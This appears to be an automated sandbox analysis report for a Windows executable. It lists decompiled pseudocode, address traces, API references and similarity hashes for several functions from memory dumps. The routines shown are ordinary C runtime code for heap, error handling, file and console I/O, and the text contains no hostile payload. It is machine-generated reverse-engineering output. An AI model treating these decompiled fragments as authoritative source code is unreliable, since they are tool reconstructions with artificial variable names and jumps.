0x0043538f
0x00435391
0x00435336
0x00435336
0x004353b4
0x004353bf
0x004353cf
0x004353cf
0x00435398
0x0043539e
0x004353ab
0x00000000
0x004353ab
0x004352aa
0x004352c0
0x004352c3
0x004352c4
0x004352c6
0x004352e1
0x004352e4
0x004352e7
0x004352e8
0x004352e8
0x004352ea
0x004352fd
0x004352fd
0x004352ff
0x00435302
0x00435307
0x0043530a
0x0043530d
0x0043533f
0x00435342
0x00435349
0x00435349
0x0043534f
0x00435355
0x00435357
0x00000000
0x0043535c
0x0043530f
0x00435310
0x00435312
0x00435315
0x00435317
0x0043531a
0x0043531c
0x004352f6
0x004352f6
0x00000000
0x004352f6
0x0043531e
0x00000000
0x00000000
0x00000000
0x0043531e
0x004352ec
0x00000000
0x00000000
0x004352ee
0x004352f4
0x00000000
0x00000000
0x00000000
0x00435320
0x00435320
0x00435320
0x00435328
0x0043532e
0x00435333
0x00000000
0x00435333
0x004352cd
0x00000000
0x0043535f
0x0043535f
0x00435361
0x00000000
0x00000000
0x00435363
0x00000000
0x00000000
0x00435365
0x00435367
0x00000000
0x00000000
0x00000000
0x00435367
0x004352aa

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

Part of subcall function 0042716C: WriteFile.KERNEL32(?,?,00000000,00448520,00000000), ref: 004272BD
Part of subcall function 0042716C: GetLastError.KERNEL32(?,00000000), ref: 004272C7
Part of subcall function 0042716C: __dosmaperr.LIBCMT ref: 0042730C

_free.LIBCMT ref: 0043532E
_free.LIBCMT ref: 00435357

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

SetEndOfFile.KERNEL32(00000000,00433BAF,00000000,0042AD2A,?,?,?,?,?,?,?,00433BAF,0042AD2A,00000000), ref: 00435389
GetLastError.KERNEL32(?,?,?,?,?,?,?,00433BAF,0042AD2A,00000000,?,?,?,?,00000000), ref: 004353A5

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast$FileHeap_free$AllocateFreeWrite__dosmaperr
String ID:
API String ID: 796415747-0
Opcode ID: f3e32bcc31ad3bba977ecd66aaebdce87f877a79bf46e7d3729aa762834ce3c9
Instruction ID: 74519485151e5404c21dabfaa15176613431d498229f2ee7f036b6a1925480c0
Opcode Fuzzy Hash: f3e32bcc31ad3bba977ecd66aaebdce87f877a79bf46e7d3729aa762834ce3c9
Instruction Fuzzy Hash: 2141F772A009009BDB20BBA9DC42B9F37B5EF48364F25115BFC14E7291EA7CCC518769

Uniqueness

Uniqueness Score: 8.94%

Function 0043525E, Relevance: 6.1, APIs: 4, Instructions: 133fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00420F3F

Part of subcall function 0042716C: WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004272BD
Part of subcall function 0042716C: GetLastError.KERNEL32(?,00000000,00000000), ref: 004272C7

_free.LIBCMT ref: 0043532E
_free.LIBCMT ref: 00435357

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

SetEndOfFile.KERNEL32(00000000,00433BAF,00000000,0042AD2A,?,?,?,?,?,?,?,00433BAF,0042AD2A,00000000), ref: 00435389
GetLastError.KERNEL32(?,?,?,?,?,?,?,00433BAF,0042AD2A,00000000,?,?,?,?,00000000), ref: 004353A5

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast$FileHeap_free$AllocateFreeWrite
String ID:
API String ID: 3246920429-0
Opcode ID: 7f20e1812b1f0a339464e5dac412515a9c41777d2ad81e6cd08a0a8c7cf583df
Instruction ID: 74519485151e5404c21dabfaa15176613431d498229f2ee7f036b6a1925480c0
Opcode Fuzzy Hash: 7f20e1812b1f0a339464e5dac412515a9c41777d2ad81e6cd08a0a8c7cf583df
Instruction Fuzzy Hash: 2141F772A009009BDB20BBA9DC42B9F37B5EF48364F25115BFC14E7291EA7CCC518769

Uniqueness

Uniqueness Score: 8.94%

Function 0042C63B, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C63B(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E0042C2CD(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E0042C2CD(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E0041A8B9(GetLastError());
									_t19 =  *((intOrPtr*)(E0041A8EF(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E0042CC21(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0041A8B9(GetLastError());
						return  *((intOrPtr*)(E0041A8EF(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E0042CC21(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E0042CC07(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x0042c642
0x0042c647
0x0042c665
0x0042c667
0x0042c66a
0x0042c697
0x0042c69f
0x0042c6a1
0x0042c6ba
0x0042c6bd
0x0042c6c0
0x0042c6ce
0x0042c6dd
0x0042c6e5
0x0042c6e7
0x0042c700
0x0042c703
0x0042c703
0x0042c6e9
0x0042c6f0
0x0042c6fb
0x0042c6fb
0x0042c705
0x00000000
0x0042c705
0x0042c6c5
0x0042c6ca
0x0042c6cc
0x00000000
0x00000000
0x00000000
0x0042c6cc
0x0042c6aa
0x00000000
0x0042c6b5
0x0042c66c
0x0042c66f
0x0042c672
0x0042c685
0x0042c688
0x0042c65b
0x0042c65b
0x00000000
0x0042c65e
0x0042c678
0x0042c67d
0x0042c67f
0x0042c709
0x0042c709
0x00000000
0x0042c67f
0x0042c649
0x0042c64e
0x0042c653
0x0042c655
0x0042c658
0x00000000

APIs

Part of subcall function 0042C2CD: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00427291,?,00000000,?,?,?,00427008,0000FDE9,00000000,?), ref: 0042C36F

GetLastError.KERNEL32 ref: 0042C6A3
__dosmaperr.LIBCMT ref: 0042C6AA
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0042C6E9
__dosmaperr.LIBCMT ref: 0042C6F0

Part of subcall function 0042CC07: _free.LIBCMT ref: 0042CC15

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: cb7b3ee9d6f1bcac8d1ea0d92f6b76caff5e0135ba1f492961c50c7d943ef96f
Instruction ID: 13e76a5dafa6a8065dc98d1055a4c8175ecea5d06d134da52ea31bdd798e0f2b
Opcode Fuzzy Hash: cb7b3ee9d6f1bcac8d1ea0d92f6b76caff5e0135ba1f492961c50c7d943ef96f
Instruction Fuzzy Hash: 7F21D671700226AFDB206FA2ACC086F77ADFF40368750452AF91993350EB38ED418B6D

Uniqueness

Uniqueness Score: 7.75%

Function 004251AF, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004251AF(void* __ecx, void* __edx, void* __fp0) {
				void* __ebx;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;
				void* _t72;

				_t72 = __fp0;
				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x44b834; // 0x5
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00425D95(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00420EFE(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00425D95(__eflags,  *0x44b834, _t51);
							if(__eflags != 0) {
								E00424FD9(_t60, _t51, 0x44de90);
								E004214E2(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00425D95(__eflags,  *0x44b834, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00425D95(0,  *0x44b834, 0);
							_push(0);
							L9:
							E004214E2();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00425D56(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x44b834; // 0x5
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E0042156A(_t39, _t43, _t49, _t60, _t72);
					asm("int3");
					_t5 =  *0x44b834; // 0x5
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00425D95(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00420EFE(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00425D95(__eflags,  *0x44b834, _t60);
								if(__eflags != 0) {
									E00424FD9(_t60, _t60, 0x44de90);
									E004214E2(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00425D95(__eflags,  *0x44b834, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00425D95(__eflags,  *0x44b834, _t20);
								_push(_t60);
								L25:
								E004214E2();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00425D56(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x44b834; // 0x5
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E0042156A(_t39, _t43, _t49, _t60, _t72);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x44b834; // 0x5
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00425D95(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00420EFE(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00425D95(__eflags,  *0x44b834, _t54);
											if(__eflags != 0) {
												E00424FD9(_t61, _t54, 0x44de90);
												E004214E2(0);
												goto L45;
											} else {
												_t40 = 0;
												E00425D95(__eflags,  *0x44b834, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00425D95(0,  *0x44b834, 0);
											_push(0);
											L41:
											E004214E2();
											goto L36;
										}
									}
								} else {
									_t54 = E00425D56(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x44b834; // 0x5
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x004251af
0x004251af
0x004251af
0x004251ba
0x004251bc
0x004251c1
0x004251c4
0x004251e2
0x004251e5
0x004251ea
0x004251ec
0x00000000
0x004251ee
0x004251fa
0x004251fd
0x004251fe
0x00425200
0x00425225
0x00425227
0x00425240
0x00425247
0x0042524c
0x00000000
0x00425229
0x00425229
0x00425232
0x00425237
0x00000000
0x00425237
0x00425202
0x00425202
0x00425202
0x0042520b
0x00425210
0x00425211
0x00425211
0x00425216
0x00000000
0x00425216
0x00425200
0x004251c6
0x004251cc
0x004251d0
0x004251dd
0x00000000
0x004251d2
0x004251d5
0x0042524f
0x0042524f
0x004251d7
0x004251d7
0x004251d7
0x004251d9
0x004251d9
0x004251d9
0x004251d5
0x004251d0
0x00425252
0x0042525a
0x0042525c
0x0042525e
0x00425266
0x0042526b
0x0042526c
0x00425271
0x00425272
0x00425275
0x0042528f
0x00425292
0x00425297
0x00425299
0x00000000
0x0042529b
0x004252a7
0x004252aa
0x004252ab
0x004252ad
0x004252d0
0x004252d2
0x004252e9
0x004252f0
0x004252f5
0x00000000
0x004252d4
0x004252db
0x004252e0
0x00000000
0x004252e0
0x004252af
0x004252b6
0x004252bb
0x004252bc
0x004252bc
0x004252c1
0x00000000
0x004252c1
0x004252ad
0x00425277
0x0042527d
0x0042527f
0x00425281
0x0042528a
0x00000000
0x00425283
0x00425283
0x00425286
0x00425300
0x00425300
0x00425305
0x00425308
0x00425309
0x0042530a
0x00425311
0x00425313
0x00425318
0x0042531b
0x00425339
0x0042533c
0x00425341
0x00425343
0x00000000
0x00425345
0x00425351
0x00425355
0x00425357
0x0042537c
0x0042537e
0x00425397
0x0042539e
0x00000000
0x00425380
0x00425380
0x00425389
0x0042538e
0x00000000
0x0042538e
0x00425359
0x00425359
0x00425359
0x00425362
0x00425367
0x00425368
0x00425368
0x00000000
0x0042536d
0x00425357
0x0042531d
0x00425323
0x00425325
0x00425327
0x00425334
0x00000000
0x00425329
0x00425329
0x0042532c
0x004253a6
0x004253a6
0x0042532e
0x0042532e
0x0042532e
0x0042532e
0x00425330
0x00425330
0x00425330
0x0042532c
0x00425327
0x004253a9
0x004253b1
0x004253b3
0x004253b3
0x004253ba
0x00425288
0x004252f8
0x004252f8
0x004252fa
0x00000000
0x004252fc
0x004252ff
0x004252ff
0x004252fa
0x00425286
0x00425281
0x00425260
0x00425265
0x00425265

APIs

GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
_free.LIBCMT ref: 00425211
_free.LIBCMT ref: 00425247

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

Part of subcall function 0042156A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00421586

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast$Heap_free$AllocateFeatureFreePresentProcessor
String ID:
API String ID: 2889638995-0
Opcode ID: 912b43d84d0776718bf7bd1f6bb91025e1868d29175aa1ff066740fc89af3e29
Instruction ID: acb0545d6675d2ae40f06ad01a8a9e5ab227894188b29db7eeb1ffed5522b1e6
Opcode Fuzzy Hash: 912b43d84d0776718bf7bd1f6bb91025e1868d29175aa1ff066740fc89af3e29
Instruction Fuzzy Hash: 6511E736305A306BC61037F97D89E27265ACFC1778BB8117AF524962E5EE3DCC01856C

Uniqueness

Uniqueness Score: 3.15%

Function 004251AF, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
_free.LIBCMT ref: 00425211
_free.LIBCMT ref: 00425247

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

Part of subcall function 0042156A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00421586

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00420F3F

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast$Heap_free$AllocateFeatureFreePresentProcessor
String ID:
API String ID: 2889638995-0
Opcode ID: bc3ff6c8459d1905858b9f55fe46ca6a1fd33381e36ec8d408d835b7ad2b3bda
Instruction ID: acb0545d6675d2ae40f06ad01a8a9e5ab227894188b29db7eeb1ffed5522b1e6
Opcode Fuzzy Hash: bc3ff6c8459d1905858b9f55fe46ca6a1fd33381e36ec8d408d835b7ad2b3bda
Instruction Fuzzy Hash: 6511E736305A306BC61037F97D89E27265ACFC1778BB8117AF524962E5EE3DCC01856C

Uniqueness

Uniqueness Score: 3.15%

Function 00425306, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00425306(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x44b834; // 0x5
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00425D95(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00420EFE(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00425D95(__eflags,  *0x44b834, _t18);
							if(__eflags != 0) {
								E00424FD9(_t21, _t18, 0x44de90);
								E004214E2(0);
								goto L13;
							} else {
								_t13 = 0;
								E00425D95(__eflags,  *0x44b834, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00425D95(0,  *0x44b834, 0);
							_push(0);
							L9:
							E004214E2();
							goto L4;
						}
					}
				} else {
					_t18 = E00425D56(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x44b834; // 0x5
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x00425311
0x00425313
0x00425318
0x0042531b
0x00425339
0x0042533c
0x00425341
0x00425343
0x00000000
0x00425345
0x00425351
0x00425355
0x00425357
0x0042537c
0x0042537e
0x00425397
0x0042539e
0x00000000
0x00425380
0x00425380
0x00425389
0x0042538e
0x00000000
0x0042538e
0x00425359
0x00425359
0x00425359
0x00425362
0x00425367
0x00425368
0x00425368
0x00000000
0x0042536d
0x00425357
0x0042531d
0x00425323
0x00425327
0x00425334
0x00000000
0x00425329
0x0042532c
0x004253a6
0x004253a6
0x0042532e
0x0042532e
0x0042532e
0x00425330
0x00425330
0x00425330
0x0042532c
0x00425327
0x004253a9
0x004253b1
0x004253ba

APIs

GetLastError.KERNEL32(0041370C,0041370C,?,0041A8F4,0042155F,?,?,00416C35,?,?,1FFFFFFF,00000008,?,00413478,0041370C,?), ref: 0042530B
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008,?,00413478,0041370C,?,?,?,?), ref: 004253A9

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00425351,00000001,00000364,00000005,000000FF,?,00416C35,?,?,1FFFFFFF,00000008), ref: 00420F3F

_free.LIBCMT ref: 00425368
_free.LIBCMT ref: 0042539E

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast$Heap_free$AllocateFree
String ID:
API String ID: 3525132616-0
Opcode ID: ec52310165d012073e61fd7a41b3ed5296b702745b07a3a76290621893fa5e42
Instruction ID: dec0be782fd864e64cb829c3005031b03890016b70bb3497c70c95e2d49700e8
Opcode Fuzzy Hash: ec52310165d012073e61fd7a41b3ed5296b702745b07a3a76290621893fa5e42
Instruction Fuzzy Hash: 8F110A36305B202BC61077A97D86D2B269ACBC13B47A8213AF914862E5DE79CC00815C

Uniqueness

Uniqueness Score: 3.15%

Function 00425306, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000008,0042971E,?,?,?,?,?,?,?,?,0041B27E), ref: 0042530B
SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,?,?,?,?,?,0041B27E), ref: 004253A9

Part of subcall function 00420EFE: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00420F3F

_free.LIBCMT ref: 00425368
_free.LIBCMT ref: 0042539E

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast$Heap_free$AllocateFree
String ID:
API String ID: 3525132616-0
Opcode ID: a9e91da3b31840bf5aa32030a4461cff2e13c55a87fa4e65562b6cdddda78519
Instruction ID: dec0be782fd864e64cb829c3005031b03890016b70bb3497c70c95e2d49700e8
Opcode Fuzzy Hash: a9e91da3b31840bf5aa32030a4461cff2e13c55a87fa4e65562b6cdddda78519
Instruction Fuzzy Hash: 8F110A36305B202BC61077A97D86D2B269ACBC13B47A8213AF914862E5DE79CC00815C

Uniqueness

Uniqueness Score: 3.15%

Function 00417A77, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00417A77(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;
				void* _t39;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E004180C6(_t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00416EE2(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E004182C8(_t27, _t28, _t29, _t30, _t37, _t39);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00417881(_t29, _t32, _t37, _t39);
				if(_t25 != 0) {
					E00416EB0(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x00417a77
0x00417a77
0x00417a7a
0x00417a7f
0x00417a82
0x00417a84
0x00417a87
0x00417a8a
0x00417a8b
0x00417a8e
0x00417a93
0x00417a93
0x00417a96
0x00417a9a
0x00417a9d
0x00417aa2
0x00417a9f
0x00417a9f
0x00417a9f
0x00417aa5
0x00417aab
0x00417aae
0x00417ab0
0x00417ab3
0x00417ab6
0x00417ab7
0x00417ac0
0x00417ac5
0x00417ac8
0x00417ace
0x00417ad1
0x00417ad4
0x00417ad7
0x00417ad8
0x00417adb
0x00417ae6
0x00417aea
0x00000000
0x00417aea
0x00417af1

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00417A8E

Part of subcall function 004180C6: ___AdjustPointer.LIBCMT ref: 00418110
Part of subcall function 004180C6: ___AdjustPointer.LIBCMT ref: 0041812A

_UnwindNestedFrames.LIBCMT ref: 00417AA5

Part of subcall function 00416EE2: RtlUnwind.KERNEL32(?,00416F0C,?,00000000), ref: 00416F06

___FrameUnwindToState.LIBVCRUNTIME ref: 00417AB7

Part of subcall function 004182C8: __CallSettingFrame@12.LIBCMT ref: 00418337

CallCatchBlock.LIBVCRUNTIME ref: 00417ADB

Part of subcall function 00417881: __CreateFrameInfo.LIBVCRUNTIME ref: 004178AA
Part of subcall function 00417881: _CallCatchBlock2.LIBCMT ref: 004178F7

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: CallCatchUnwind$AdjustFramePointer$BlockBlock2BuildCreateFrame@12FramesInfoNestedObjectSettingState
String ID:
API String ID: 3855606278-0
Opcode ID: d3ef0d0ece84cce140de381462420ee783678545847aa9ccdb6add25c85043b3
Instruction ID: 183510783c5c6f06dcfdddf75b05b1dc3cf4e27af233c5ce2277e8500af6b6b6
Opcode Fuzzy Hash: d3ef0d0ece84cce140de381462420ee783678545847aa9ccdb6add25c85043b3
Instruction Fuzzy Hash: FC011732500109BBCF129F96CC01EDF3BBAEF48754F15811AF91862120D77AE9A1DBA8

Uniqueness

Uniqueness Score: 1.34%

Function 00434EE1, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00434EE1(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x44c000, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00434ECA();
					E00434E8C();
					_t13 = WriteConsoleW( *0x44c000, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00434efe
